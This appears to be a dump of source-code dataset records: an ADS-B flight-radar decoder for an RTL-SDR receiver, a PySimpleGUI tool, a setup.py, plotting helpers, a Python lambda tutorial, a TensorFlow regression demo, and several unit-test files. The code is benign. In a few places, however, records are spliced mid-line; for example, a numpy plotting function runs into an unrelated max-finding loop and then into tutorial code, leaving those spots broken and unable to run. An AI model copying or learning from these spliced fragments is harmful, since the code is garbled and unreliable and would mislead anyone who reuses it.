CRC is always the last three bytes.\n crc = (msg[(msgbits//8)-3] << 16) | (msg[(msgbits//8)-2] << 8) | msg[(msgbits//8)-1];\n crc2 = modesChecksum(msg,msgbits)\n crcok = (crc == crc2)\n \n # Correct 1-bit error\n if (not crcok):\n crcok = fixSingleBitErrors( msg, msgbits )\n \n \n # ICAO address ( airplane address )\n aa1 = msg[1]\n aa2 = msg[2]\n aa3 = msg[3]\n \n \n # Get DF 17 (ADSB) extended squitter types\n metype = msg[4] >> 3 # extended squitter message type\n mesub = msg[4] & 7\n \n \n # Decode extended squitter, ignore all other messages\n if ( (msgtype == 17) and crcok ):\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found DF-17 packet\\n\"\n sys.__stdout__.write(strp)\n log.write(strp)\n \n addr = (aa1 << 16 ) | (aa2 << 8) | aa3\n \n # Add plane address to plane_list\n if ( addr in plane_list ):\n plane = plane_list[addr]\n else:\n plane = Plane(addr)\n plane_list[addr] = plane\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found new plane (ICAO: %x)!\\n\" % addr\n sys.__stdout__.write(strp)\n log.write(strp)\n if ( len(plane_list) == 1):\n print(\"Found %d plane\" % len(plane_list))\n \n else:\n print(\"Found %d planes\" % len(plane_list))\n \n if ( metype >=1 and metype <= 4 ):\n aircraft_type = metype - 1\n flight_index = np.array( [ msg[5] >> 2,\n ((msg[5]&3)<<4)|(msg[6]>>4),\n ((msg[6]&15)<<2)|(msg[7]>>6),\n msg[7]&63,\n msg[8]>>2,\n ((msg[8]&3)<<4)|(msg[9]>>4),\n ((msg[9]&15)<<2)|(msg[10]>>6),\n msg[10]&63] )\n \n flightnum = ais_charset[ flight_index ]\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found flight number %s for plane %x!\\n\" % (''.join(flightnum), addr)\n \n sys.__stdout__.write(strp)\n log.write(strp)\n \n plane.addplanetype( aircraft_type )\n plane.addflightnum( \"\".join( flightnum ) )\n elif ( metype >= 9 and metype <= 18 ):\n \n # latitude and longitude are in CPR format\n # here we implement the global decoding described in section 5.3.1:\n # http://adsb.tc.faa.gov/WG3_Meetings/Meeting29/1090-WP29-07-Draft_CPR101_Appendix.pdf\n # see also:\n # https://sites.google.com/site/adsbreceiver/\n # http://www.lll.lu/~edward/edward/adsb/DecodingADSBposition.html\n # http://aviation.stackexchange.com/questions/3707/ads-b-compact-position-report-nl-function\n \n \n isodd = msg[6] & (1<<2);\n lat_enc = ((msg[6] & 3) << 15) | (msg[7] << 7) | (msg[8] >> 1); \n lon_enc = ((msg[8] & 1) << 16) | (msg[9] << 8) | msg[10];\n \n if (isodd):\n plane.lat1 = lat_enc\n plane.lon1 = lon_enc\n plane.time1 = time.time()\n \n if (plane.time0 == -1):\n return\n else:\n plane.lat0 = lat_enc\n plane.lon0 = lon_enc\n plane.time0 = time.time()\n \n if (plane.time1 == -1):\n return\n \n if ( abs( plane.time0 - plane.time1 ) <= 10):\n decodeCPR( plane )\n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found position (%f,%f) for plane %x!\\n\" % (plane.position[0], plane.position[1], addr)\n sys.__stdout__.write(strp)\n log.write(strp)\n sys.stdout.flush()\n \n elif ( metype == 19 and mesub >=1 and mesub <= 4 ):\n if ( mesub == 1 or mesub == 2):\n ew_dir = (msg[5]&4) >> 2;\n ew_velocity = ((msg[5]&3) << 8) | msg[6];\n ns_dir = (msg[7]&0x80) >> 7;\n ns_velocity = ((msg[7]&0x7f) << 3) | ((msg[8]&0xe0) >> 5);\n vert_rate_source = (msg[8]&0x10) >> 4;\n vert_rate_sign = (msg[8]&0x8) >> 3;\n vert_rate = ((msg[8]&7) << 6) | ((msg[9]&0xfc) >> 2);\n # Compute velocity and angle from the two speed components. 
\n velocity = sqrt(ns_velocity*ns_velocity+ew_velocity*ew_velocity);\n if (velocity):\n ewv = ew_velocity;\n nsv = ns_velocity;\n\n if (ew_dir): ewv *= -1;\n if (ns_dir): nsv *= -1;\n heading = -arctan2(ewv,nsv);\n \n # We don't want negative values but a 0-360 scale. \n if (heading < 0):\n heading += 2 * np.pi;\n else:\n heading = 0;\n plane.heading = heading\n \n if ( mesub == 3 or mesub == 4):\n plane.heading = (360 / 128) * (((msg[5] & 3) << 5) | (msg[6] >> 3)) * np.pi / 180;\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found plane angle %f degree for plane %x!\\n\" % (plane.heading * 180.0 / np.pi, addr)\n sys.__stdout__.write(strp)\n log.write(strp)\n sys.stdout.flush()\n\n\ndef sdr_read( Qin, sdr, N_samples, stop_flag ):\n \n t0 = time.time()\n while ( not stop_flag.is_set() ):\n data_chunk = abs(sdr.read_samples(N_samples)) # get samples \n Qin.put( data_chunk ) # append to list\n\n sdr.close()\n \n\ndef signal_process( Qin, source, functions, plot, log, stop_flag ):\n\n detectPreamble = functions[0]\n data2bit = functions[1]\n \n b = 0\n plane_list = {};\n while( not stop_flag.is_set() ):\n \n # Get streaming chunk\n chunk = Qin.get();\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" looking for packets...\\n\"\n sys.__stdout__.write(strp)\n log.write(strp)\n \n idx_preamble = detectPreamble(chunk)\n \n for n in idx_preamble:\n bits = data2bit(chunk[n:(n+16+MODES_LONG_MSG_BITS*2)])\n msg = bit2byte( bits )\n decodeModesMessage( msg, plane_list, log )\n \n # Update map:\n lat = []\n lon = []\n heading = []\n flightnum = []\n for addr in plane_list:\n plane = plane_list[addr]\n (mx, my) = LatLonToMeters(plane.position[0],plane.position[1])\n lat.append( my )\n lon.append( mx )\n heading.append( plane.heading )\n flightnum.append( plane.flightnum )\n \n source.data['lat'] = lat\n source.data['lon'] = lon\n source.data['heading'] = heading\n source.data['flightnum'] = flightnum\n \n push_notebook()\n Qin.queue.clear()\n \n log.close()\n \n \ndef LatLonToMeters(lat, lon ):\n #\"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\"\n originShift = 2 * math.pi * 6378137 / 2.0\n mx = lon * originShift / 180.0\n my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0)\n\n my = my * originShift / 180.0\n return mx, my\n\n \ndef rt_flight_radar( fs, center_freq, gain, N_samples, pos_ref, functions ):\n\n #clear_output()\n #time.sleep(1)\n # create an input output FIFO queues\n Qin = queue.Queue()\n \n # create a pyaudio object\n sdr = RtlSdr()\n sdr.sample_rate = fs # sampling rate\n sdr.center_freq = center_freq # 1090MhZ center frequency\n sdr.gain = gain\n \n # initialize map\n\n # Berkeley (lat, lon) = (37.871853, -122.258423)\n \n (mx_d, my_d) = LatLonToMeters(pos_ref[0]-0.2, pos_ref[1]-0.2)\n (mx_u, my_u) = LatLonToMeters(pos_ref[0]+0.2, pos_ref[1]+0.2)\n \n plot = figure(x_range=(mx_d, mx_u), y_range=(my_d, my_u),\n x_axis_type=\"mercator\", y_axis_type=\"mercator\")\n plot.add_tile(get_provider('CARTODBPOSITRON'))\n\n plot.title.text = \"Flight Radar\"\n\n # create lat, longitude source\n source = ColumnDataSource(\n data=dict(\n lat=[],\n lon=[],\n heading = [],\n flightnum = []\n )\n )\n \n # create plane figure\n oval1 = Oval( x = \"lon\", y = \"lat\", width=3000, height=700, angle= \"heading\", fill_color=\"blue\", line_color=\"blue\")\n oval2 = Oval( x = \"lon\", y = \"lat\", width=1000, height=7000, angle= \"heading\", fill_color=\"blue\", line_color=\"blue\")\n text = Text( x = \"lon\", y = \"lat\", 
text_font_size=\"10pt\", text=\"flightnum\", angle= \"heading\", text_color=\"red\")\n \n plot.add_glyph(source, oval1)\n plot.add_glyph(source, oval2)\n plot.add_glyph(source, text)\n\n output_notebook()\n handle = show(plot,notebook_handle=True)\n \n # initialize write file\n log = open('rtadsb_log','a')\n \n # initialize stop_flag\n stop_flag = threading.Event()\n\n # initialize threads\n t_sdr_read = threading.Thread(target = sdr_read, args = (Qin, sdr, N_samples, stop_flag ))\n t_signal_process = threading.Thread(target = signal_process, args = ( Qin, source, functions, plot, log, stop_flag))\n \n # start threads\n t_sdr_read.start()\n t_signal_process.start()\n\n return stop_flag\n","sub_path":"rtadsb.py","file_name":"rtadsb.py","file_ext":"py","file_size_in_byte":15367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156584725","text":"import sys\r\nimport PySimpleGUI as sg\r\nfrom OutputWindow import EmbeddedOutputWindow, stdOutputWrapper\r\n\r\nfrom FetchCr import FetchCrs\r\nfrom ParseCRs import ParseCRs\r\nfrom MakeCvsLattix import MakeCvsLattix\r\nfrom MakeCvsTable import MakeCvsTable\r\nfrom MakeDotFile import MakeDotFile\r\nfrom Report_dsp import makeDspReport\r\nfrom DDproducts import products\r\n\r\nsg.change_look_and_feel( 'Dark2' )\r\n\r\n# # Column 1 layout\r\n\r\nmaxKeyLength = 0\r\nfor prodKey in products.keys() :\r\n\tmaxKeyLength = max( maxKeyLength, len( prodKey ) )\r\n\r\ncolum1Layout = []\r\nfor prodKey, prodVal in products.items() :\r\n\tif len( prodVal ) > 58 :\r\n\t\tshortVal = '...' + prodVal[-55:] \r\n\telse :\r\n\t\tshortVal = prodVal\r\n\t\t\r\n\tcolum1Layout.append( [\r\n\t\t\t\t\t\t sg.Text( prodKey, justification = 'right', size = ( maxKeyLength + 1, 1 ) ),\r\n\t sg.InputText( shortVal, tooltip=prodVal, size = ( 60, 15 ), justification = 'left', disabled = True , font = 'Courier' )\r\n\t ] )\r\n\r\n# # Column 2 layout\r\n\r\noutTextField = EmbeddedOutputWindow( key = 'outputField', size = ( 120, 35 ), autoscroll = True )\r\n\r\ncolum2Layout = [ [ sg.Button( \"Fetch CR's\", key = 'fetchBtn' ), sg.Button( \"Parse CR's\", key = 'parseBtn' ) ],\r\n\t\t\t\t [ sg.Checkbox( \"Unconditional fetch\", key = 'forceFetch' ) ],\r\n\t\t\t\t [ sg.Text( '_' * 30 ) ],\r\n\t\t\t\t [ sg.Button( 'Make CSV for Lattix', key = 'makeLattix', size = ( 23, None ) ), sg.InputText( key = 'pathLattix' , default_text = 'lattix.csv' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Button( 'Make simple matrix CSV', key = 'makeMatrix', size = ( 23, None ) ), sg.InputText( key = 'pathMatrix' , default_text = 'dd.csv' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Button( 'Make DSP report', key = 'makeReport', size = ( 23, None ) ), sg.InputText( key = 'pathRepport', default_text = 'Report.csv' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Button( 'Make dot file', key = 'makeDotfile', size = ( 23, None ) ), sg.InputText( key = 'pathDotfile', default_text = 'allDeps.dot' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Exit()],\r\n\t\t\t\t [ outTextField ],\r\n\t\t\t ]\r\n\r\n# Create the Window\r\ncolum1 = sg.Column( colum1Layout , scrollable = True, vertical_scroll_only = True )\r\ncolum2 = sg.Column( colum2Layout )\r\n\r\n\r\nlayout = [\r\n\t\t\t[ colum1, colum2 ]\r\n\t\t ]\r\n\r\nwindow = sg.Window( 'Config record dep extractor', layout, resizable = True )\r\n\r\n# Event Loop to process \"events\" and get the \"values\" of the inputs\r\n\r\ndef PassiveUpdate() :\r\n\twindow.Read( timeout = 0 )\r\n\r\nsys.stdout = stdOutputWrapper( sys.stdout, outTextField.Print, 
PassiveUpdate )\r\nsys.stderr = stdOutputWrapper( sys.stderr, outTextField.PrintErr, PassiveUpdate )\r\n\r\n\r\ndef StartStdoutputCapture():\r\n\tsys.stdout.ActivateGui()\r\n\tsys.stderr.ActivateGui()\r\n\r\n\r\ndef EndStdoutputCapture():\r\n\tsys.stdout.DeactivateGui()\r\n\tsys.stderr.DeactivateGui()\r\n\r\n\r\nwhile True:\r\n\tevent, values = window.read()\r\n\tif event in ( None, 'Exit' ): # if user closes window or clicks cancel\r\n\t\tbreak\r\n\telif event == 'fetchBtn' :\r\n\t\tStartStdoutputCapture()\r\n\t\tFetchCrs( values[ 'forceFetch' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'parseBtn' :\r\n\t\tStartStdoutputCapture()\r\n\t\tParseCRs()\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeLattix' :\r\n\t\tStartStdoutputCapture()\r\n\t\tMakeCvsLattix( values[ 'pathLattix' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeMatrix' :\r\n\t\tStartStdoutputCapture()\r\n\t\tMakeCvsTable( values['pathMatrix'] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeReport' :\r\n\t\tStartStdoutputCapture()\r\n\t\tmakeDspReport( values[ 'pathRepport' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeDotfile' :\r\n\t\tStartStdoutputCapture()\r\n\t\tMakeDotFile( values[ 'pathDotfile' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telse :\r\n\t\tprint( event, values )\r\n\r\nwindow.close()\r\n\r\nif __name__ == '__main__':\r\n\tpass\r\n","sub_path":"ConfigRecord_DependencyExtractor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263433064","text":"from setuptools import setup\n\nREADME_file = open('README.rst')\nREADME = README_file.read()\nREADME_file.close()\n\nsetup(name='clifig',\n version='0.1',\n description='A simple prompt to modify config files.',\n long_description=README,\n keywords='ConfigParser command-line cli config configuration conf',\n classifiers=['License :: OSI Approved :: MIT License',\n 'Development Status :: 3 - Alpha',\n 'Operating System :: OS Independent',\n 'Topic :: Utilities'],\n url='https://github.com/andrewguenther/clifig',\n author='Andrew Guenther',\n author_email='guenther.andrew.j@gmail.com',\n license='MIT',\n packages=['clifig'],\n scripts=['bin/clifig']\n )\n","sub_path":"pypi_install_script/clifig-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"421531862","text":"from rohan.global_imports import *\n\ndef _plot(ax, coords, pos_columns, **plot_style):\n \"\"\" This function wraps Axes.plot to make its call signature the same for\n 2D and 3D plotting. 
The y axis is inverted for 2D plots, but not for 3D\n plots.\n\n Parameters\n ----------\n ax : Axes object\n The axes object on which the plot will be called\n coords : DataFrame\n DataFrame of coordinates that will be plotted\n pos_columns : list of strings\n List of column names in x, y(, z) order.\n plot_style : keyword arguments\n Keyword arguments passed through to the `Axes.plot(...)` method\n\n Returns\n -------\n Axes object\n \"\"\"\n if len(pos_columns) == 3:\n return ax.plot(coords[pos_columns[0]], coords[pos_columns[1]],\n zs=coords[pos_columns[2]], **plot_style)\n elif len(pos_columns) == 2:\n return ax.plot(coords[pos_columns[0]], coords[pos_columns[1]],\n **plot_style)\ndef plot_trajectories(traj,image, colorby='particle', mpp=None, label=False,\n cmap=None, ax=None, t_column=None,\n pos_columns=None, plot_style={},\n params_text={'ha':'center','va':'center'}, **kwargs):\n \"\"\"Plot traces of trajectories for each particle.\n Optionally image it on a frame from the video.\n\n Parameters\n ----------\n traj : DataFrame\n The DataFrame should include time and spatial coordinate columns.\n colorby : {'particle', 'frame'}, optional\n mpp : float, optional\n Microns per pixel. If omitted, the labels will have units of pixels.\n label : boolean, optional\n Set to True to write particle ID numbers next to trajectories.\n image : ndarray, optional\n Background image, default None\n cmap : colormap, optional\n This is only used in colorby='frame' mode. Default = mpl.cm.winter\n ax : matplotlib axes object, optional\n Defaults to current axes\n t_column : string, optional\n DataFrame column name for time coordinate. Default is 'frame'.\n pos_columns : list of strings, optional\n Dataframe column names for spatial coordinates. Default is ['x', 'y'].\n plot_style : dictionary\n Keyword arguments passed through to the `Axes.plot(...)` command\n\n Returns\n -------\n Axes object\n \n See Also\n --------\n plot_traj3d : the 3D equivalent of `plot_traj`\n \"\"\"\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n from matplotlib.collections import LineCollection\n from rohan.dandage.plot.colors import get_cmap_subset\n# if cmap is None:\n# cmap = get_cmap_subset('binary',vmin=0.15,vmax=0.05)\n if t_column is None:\n t_column = 'frame'\n if pos_columns is None:\n pos_columns = ['x', 'y']\n if len(traj) == 0:\n raise ValueError(\"DataFrame of trajectories is empty.\")\n _plot_style = dict(linewidth=1)\n # Background image\n ax=plt.subplot() if ax is None else ax\n ax.imshow(image,cmap=get_cmap_subset('binary',vmin=0.2,vmax=0))\n # Trajectories\n \n \n# if colorby == 'particle':\n# # Unstack particles into columns.\n# unstacked = traj.set_index(['particle', t_column])[pos_columns].unstack()\n# for i, trajectory in unstacked.iterrows():\n# _plot(ax, mpp*trajectory, pos_columns, **_plot_style)\n# elif colorby == 'frame':\n# # Read http://www.scipy.org/Cookbook/Matplotlib/MulticoloredLine\n# x = traj.set_index([t_column, 'particle'])['x'].unstack()\n# y = traj.set_index([t_column, 'particle'])['y'].unstack()\n# color_numbers = traj[t_column].values/float(traj[t_column].max())\n# # logger.info(\"Drawing multicolor lines takes awhile. 
\"\n# # \"Come back in a minute.\")\n# for particle in x:\n# points = np.array(\n# [x[particle].values, y[particle].values]).T.reshape(-1, 1, 2)\n# segments = np.concatenate([points[:-1], points[1:]], axis=1)\n# lc = LineCollection(segments, cmap=cmap)\n# lc.set_array(color_numbers)\n# ax.add_collection(lc)\n# # ax.set_xlim(x.apply(np.min).min(), x.apply(np.max).max())\n# # ax.set_ylim(y.apply(np.min).min(), y.apply(np.max).max())\n# else: \n \n# if label:\n# unstacked = traj.set_index([t_column, 'particle'])[pos_columns].unstack()\n# first_frame = int(traj[t_column].min())\n# coords = unstacked.fillna(method='backfill').stack().loc[first_frame]\n# for particle_id, coord in coords.iterrows():\n# ax.text(*coord.tolist(), s=\"%d\" % particle_id,\n# **params_text)\n ax.set_xlim(0,image.shape[0])\n ax.set_ylim(0,image.shape[1])\n ax.set_ylim(ax.get_ylim()[::-1])\n return ax \n\ndef plot_properties_cell(cellcfg,df2,cols_colorby,colx='x',coly='y'):\n from rohan.dandage.stat.norm import rescale\n from rohan.dandage.plot.contour import plot_contourf\n ncols=4\n nrows=int(np.ceil(len(cols_colorby)/4))\n fig,axes=plt.subplots(nrows,ncols,\n# sharex=True,sharey=True,\n figsize=[ncols*4,nrows*4]\n )\n# metric_type='max'\n for axi,(colorby,ax) in enumerate(zip(cols_colorby,np.ravel(axes))):\n fig,ax=plot_contourf(df2[colx],df2[coly],\n rescale(df2[colorby]),\n ax=ax,\n fig=fig,\n cbar=True if ((axi+1) % 4)==0 else False,\n params_contourf={'cmap':'binary','vmin':0,'vmax':1,'corner_mask':False},)\n ax=df2.plot.scatter(x=colx,y=coly,color='green',\n s=10,\n alpha=0.5,\n ax=ax) \n ax.contour(np.load(cellcfg['cellbrightp']), [0.5], linewidths=1, linestyles='dashed',colors='cyan') \n ax.set_title(colorby)\n ax.invert_yaxis()\n ax.axis('equal')\n# ax.set_ylim(ax.get_ylim()[::-1])\n# ax.set_axis_off()\n plt.tight_layout()\n \ndef dist_signal(img,threshold=None,label_threshold=None,\n params_hist={},\n params_axvline={'color':'r','linestyle':'dashed'},\n ax=None):\n ax=plt.subplot() if ax is None else ax \n a=np.ravel(img)\n a = a[~np.isnan(a)]\n a=np.extract(a fmax:\n\t\tsmax = fmax\n\t\tfmax = list1[n2]\n\tif smax < list1[n2] y else \"小于\")\n\n# map,对sequence中的item依次执行function(item),将执行结果function(item)组成一个List返回\ntempX = [1, 2, 3, 4, 5]\nprint('map: ', list(map(lambda d: d**2, tempX)))\n\n\n# reduce(function,iterable[, initializer],)\n# function 需要2个参数,1个用于保存操作结果,另一个是每次迭代的元素\n# iterable 待迭代处理的集合\n# initializer 初始值,可以没有,相当于 集合 多了一个元素,第一个元素是initializer的值\n# 用传给 reduce 中的函数 function(有两个参数)先对集合中的第 1、2 个元素进行操作,得到的结果再与第三个数据用 function 函数运算,最后得到一个结果\ntempY = reduce(lambda d, y: d*2, tempX, 10)\nprint('reduce: ', tempY)\n\n\n# filter\ntempA = [1, 2, 3, 4, 5, 6, 7, 8, 9]\ntempZ = filter(lambda x: x % 2 == 1, tempA)\nprint(list(tempZ))\n\nlistT = [1, 2, 3, 4]\nt = reduce(lambda x, y: x*2, listT)\nprint(\"t: {}\".format(t))\n\n\ndef add(a, b):\n return a*2\n\nt1 = reduce(add, listT, 20)\nprint(\"t1: {}\".format(t1))\n","sub_path":"day5/lambda学习.py","file_name":"lambda学习.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292471422","text":"# -*- coding: utf-8 -*-\n# import pandas as pd\nimport tensorflow as tf\nimport numpy as np\n\n# tf.logging.set_verbosity(tf.logging.ERROR) #日志级别设置成 ERROR,避免干扰\n# np.set_printoptions(threshold='nan') #打印内容不限制长度\n\nnp.random.seed(123)\nt_x = np.floor(10 * np.random.random([5]),dtype=np.float32) #造一组随机输入\nt_y = t_x * 3.0 + 8.0 # 根据输入计算输出\n'''\ndf = 
pd.read_csv('C:/Users/hey/Desktop/aecopd.csv', header=0, index_col=0)\nt_x = df[['pm25']]\nt_y = df[['event']]\n'''\n\nx = tf.placeholder(tf.float32) # 输入量,在 TensorFlow 中以占位符 placeholder 表示\ny = tf.placeholder(tf.float32)\na = tf.Variable(1.0) #输出量,在 TensorFlow 中以Variable 表示\nb = tf.Variable(1.0)\ncurr_y = x * a + b #定义关系\nloss = tf.reduce_sum(tf.square(curr_y - y)) #定义损失函数,实际输出数据和训练输出数据的方差\noptimizer = tf.train.GradientDescentOptimizer(0.001) #定义求解最小损失函数方法——梯度下降(Gradient descent),学习率0.001\n# optimizer = tf.train.GradientDescentOptimizer(0.00000001)\ntrain = optimizer.minimize(loss) #训练的结果是使得损失函数最小\n\n\nsess = tf.Session() #创建 Session\nsess.run(tf.global_variables_initializer()) #变量初始化\nfor i in range(3000):\n sess.run(train, {x:t_x, y:t_y})\nprint(sess.run([a,b,loss],{x:t_x, y:t_y}))\n\n''' 用误差精度控制迭代次数\nLOSS_MIN_VALUE = tf.constant(1e-2) #达到此精度的时候结束训练\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nrun_count = 0\nlast_loss = 0\nwhile True:\n run_count = run_count+1\n sess.run(train, {x:t_x, y:t_y})\n curr_loss,is_ok = sess.run([loss,loss < LOSS_MIN_VALUE],{x:t_x, y:t_y})\n if last_loss == curr_loss:\n break\n last_loss = curr_loss\n if is_ok:\n break\nprint(\"运行%d 次,loss=%s\" % (run_count,curr_loss))\nprint(sess.run([a,b,loss],{x:t_x, y:t_y}))\n'''\n\nexit(0)","sub_path":"tensorflow-line-1.py","file_name":"tensorflow-line-1.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"218180595","text":"#!/usr/bin/env python3\r\n\r\nimport math\r\nimport os\r\n\r\ndef ordered_merge(*args,selector=[]):\r\n \"\"\"Vraci generator\"\"\"\r\n try:\r\n slovnik={key:iter(value) for key, value in enumerate(args)}\r\n for key in selector:\r\n yield next(slovnik.get(key))\r\n except NameError:\r\n return None\r\n\r\nclass TooManyCallsError(Exception):\r\n \"\"\"Vyjimka\"\"\"\r\n pass\r\n\r\ndef limit_calls(max_calls=2,error_message_tail=\"function \\\"pyth\\\" - called too often\"):\r\n \"\"\"Dekorator, ktery limituje pocty volani\"\"\"\r\n def _limit_calls(funkce):\r\n def __limit_calls(*args,**kwargs):\r\n try:\r\n if __limit_calls.calls= a[num] * max(abs(right - num), abs(num - left)):\n big = a[j] * max(abs(right - j), abs(j - left))\n num = j\n if abs(right - j) > abs(j - left):\n r = True\n l = False\n else:\n r = False\n l = True \n \n ans += big\n a[num] = -1\n \n if r:\n right -= 1\n if l:\n left += 1\n \nprint(ans) \n","sub_path":"contest/abc163/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510071028","text":"from .framework import BaseTestCase\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pyjedi.pb import common_pb2\n\nfrom jedi.libs.utils.dt import UTC_TZ\nfrom jedi.models.consts import ClassType\nfrom jedi.models.onlineclass.consts import PublishStatus\nfrom jedi.models.onlineclass.consts import ClassStatus, ClassStatusInfo\n\n\nclass TestOpenClass(BaseTestCase):\n\n def create_openclass(\n self, course_id='154', lesson_id='344', teacher_id='3324',\n provider=common_pb2.XUEDIANYUN, description='jedi test description',\n img_src='jedi test img_src', img_src_mobile='jedi test img_src_mobile',\n start_age=8, end_age=12, students_init_show=5, allowed_channel_ids=['1', '9', '7'],\n start_time=datetime.now(tz=UTC_TZ) + timedelta(days=3),\n exp_status_code=common_pb2.OK):\n\n result = self.add_timeslot(start_time=start_time, 
teacher_id=teacher_id)\n timeslot_id = result.timeslot.id\n\n result = self.jedi_client.create_openclass(\n course_id=course_id,\n lesson_id=lesson_id,\n timeslot_id=timeslot_id,\n provider=provider,\n description=description,\n img_src=img_src,\n img_src_mobile=img_src_mobile,\n start_age=start_age,\n end_age=end_age,\n students_init_show=students_init_show,\n allowed_channel_ids=allowed_channel_ids,\n metadata=self.metadata)\n\n assert result.status_code == exp_status_code\n opc_id = result.openclass.id\n\n if (exp_status_code == common_pb2.OK):\n response = self.jedi_client.get_openclass(opc_id, metadata=self.metadata)\n assert response.openclass.id == opc_id\n assert response.openclass.course_id == course_id\n assert response.openclass.lesson_id == lesson_id\n assert response.openclass.teacher_id == teacher_id\n assert response.openclass.schedule_time.day == start_time.day\n assert response.openclass.schedule_time.hour == start_time.hour\n assert response.openclass.schedule_time.minute == start_time.minute\n assert response.openclass.status == ClassStatus.created\n assert response.openclass.status_info == ClassStatusInfo.none\n assert response.openclass.type == ClassType.open_class\n assert response.openclass.provider == provider\n assert response.openclass.description == description\n assert response.openclass.img_src == img_src\n assert response.openclass.img_src_mobile == img_src_mobile\n assert response.openclass.start_age == start_age\n assert response.openclass.end_age == end_age\n assert response.openclass.students_init_show == students_init_show\n assert response.openclass.publish_status == PublishStatus.drafted\n assert response.openclass.allowed_channel_ids == allowed_channel_ids\n\n def test_create_openclass_with_all_params_should_be_ok(self):\n self.create_openclass()\n\n def test_create_openclass_course_id_is_null_should_be_value_error(self):\n self.create_openclass(course_id='', exp_status_code=common_pb2.VALUE_ERROR)\n\n def test_create_openclass_lesson_id_is_null_should_be_value_error(self):\n self.create_openclass(course_id='', exp_status_code=common_pb2.VALUE_ERROR)\n\n def test_create_openclass_description_is_none_should_be_ok(self):\n self.create_openclass(description='', exp_status_code=common_pb2.OK)\n\n def test_create_openclass_img_src_is_none_should_be_ok(self):\n self.create_openclass(img_src='', img_src_mobile='', exp_status_code=common_pb2.OK)\n\n def test_create_openclass_start_age_zero_should_be_ok(self):\n self.create_openclass(start_age=0, exp_status_code=common_pb2.OK)\n\n def test_create_openclass_end_age_negative_should_be_ok(self):\n self.create_openclass(end_age=10, exp_status_code=common_pb2.OK)\n\n def test_create_openclass_students_init_show_negative_should_be_ok(self):\n self.create_openclass(students_init_show=0, exp_status_code=common_pb2.OK)\n\n def test_create_openclass_allowed_channel_ids_is_none_should_be_ok(self):\n self.create_openclass(allowed_channel_ids=[], exp_status_code=common_pb2.OK)\n\n def test_create_openclass_with_duobeiyun_should_be_ok(self):\n self.create_openclass(provider=common_pb2.DUOBEIYUN)\n\n def test_create_openclass_multi_allowed_channel_ids_should_be_ok(self):\n self.create_openclass(allowed_channel_ids=['7'])\n","sub_path":"jedi/apitests/test_openclass_create.py","file_name":"test_openclass_create.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"35721485","text":"#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n\n\"\"\"\nDefines unit tests for :mod:`colour.algebra.matrix` module.\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport numpy as np\nimport sys\n\nif sys.version_info[:2] <= (2, 6):\n    import unittest2 as unittest\nelse:\n    import unittest\n\nfrom colour.algebra import is_identity\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2013 - 2015 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['TestIsIdentity']\n\n\nclass TestIsIdentity(unittest.TestCase):\n    \"\"\"\n    Defines :func:`colour.algebra.matrix.is_identity` definition unit tests\n    methods.\n    \"\"\"\n\n    def test_is_identity(self):\n        \"\"\"\n        Tests :func:`colour.algebra.matrix.is_identity` definition.\n        \"\"\"\n\n        self.assertTrue(\n            is_identity(np.array([1, 0, 0, 0, 1, 0, 0, 0, 1]).reshape(3, 3)))\n        self.assertFalse(\n            is_identity(np.array([1, 2, 0, 0, 1, 0, 0, 0, 1]).reshape(3, 3)))\n        self.assertTrue(\n            is_identity(np.array([1, 0, 0, 1]).reshape(2, 2), n=2))\n        self.assertFalse(\n            is_identity(np.array([1, 2, 0, 1]).reshape(2, 2), n=2))\n\n\nif __name__ == '__main__':\n    